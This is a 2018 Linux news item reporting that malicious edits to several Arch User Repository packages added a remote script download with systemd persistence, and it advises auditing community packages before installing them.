Headlines |
2018-07-10 |
AUR packages compromised |
|
People who run Arch Linux, or one of its many derivatives, received a reminder last week that while the Arch User Repository (AUR) is a convenient way to access a large number of software packages, the packages in that repository can come from anywhere and should not be blindly trusted. Sensors Tech Forum reports: "Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project's user-maintained AUR packages (which stands for Arch User Repository) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions. The security investigation shows that shows that a malicious user with the nick name xeactor modified in June 7 an orphaned package (software without an active maintainer) called acroraed. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." Most Linux distribution have optional add-on repositories where community members can upload scripts or packages. These third-party items should be audited before being installed. |
More headlines from this project
Back to News
|
|
TUXEDO |
TUXEDO Computers - Linux Hardware in a tailor made suite Choose from a wide range of laptops and PCs in various sizes and shapes at TUXEDOComputers.com. Every machine comes pre-installed and ready-to-run with Linux. Full 24 months of warranty and lifetime support included!
Learn more about our full service package and all benefits from buying at TUXEDO.
|
Star Labs |
Star Labs - Laptops built for Linux.
View our range including the highly anticipated StarFighter. Available with coreboot open-source firmware and a choice of Ubuntu, elementary, Manjaro and more. Visit Star Labs for information, to buy and get support.
|
|